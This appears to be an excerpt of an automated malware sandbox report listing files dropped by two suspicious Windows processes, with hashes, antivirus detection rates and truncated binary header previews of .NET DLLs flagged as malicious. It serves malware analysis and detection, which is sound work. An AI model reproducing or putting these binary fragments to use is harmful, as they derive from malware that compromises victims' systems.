                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Joe Sandbox View:
                                                                                                 • Filename: 7aHY4r6vXR.exe, Detection: malicious
                                                                                                 • Filename: 0V2JsCrGUB.exe, Detection: malicious
                                                                                                 • Filename: FYKrlfQrxb.exe, Detection: malicious
                                                                                                 • Filename: PlZA6b48MW.exe, Detection: malicious
                                                                                                 • Filename: 3XtEci4Mmo.exe, Detection: malicious
                                                                                                 • Filename: wxl1r0lntg.exe, Detection: malicious
                                                                                                 • Filename: HaLCYOFjMN.exe, Detection: malicious
                                                                                                 • Filename: Z90Z9bYzPa.exe, Detection: malicious
                                                                                                 • Filename: 0J5DzstGPi.exe, Detection: malicious
                                                                                                 • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):89600
                                                                                                Entropy (8bit):5.905167202474779
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                MD5:06442F43E1001D860C8A19A752F19085
                                                                                                SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33280
                                                                                                Entropy (8bit):5.634433516692816
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33280
                                                                                                Entropy (8bit):5.634433516692816
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):342528
                                                                                                Entropy (8bit):6.170134230759619
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):64000
                                                                                                Entropy (8bit):5.857602289000348
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):89600
                                                                                                Entropy (8bit):5.905167202474779
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                MD5:06442F43E1001D860C8A19A752F19085
                                                                                                SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):64000
                                                                                                Entropy (8bit):5.857602289000348
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):342528
                                                                                                Entropy (8bit):6.170134230759619
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
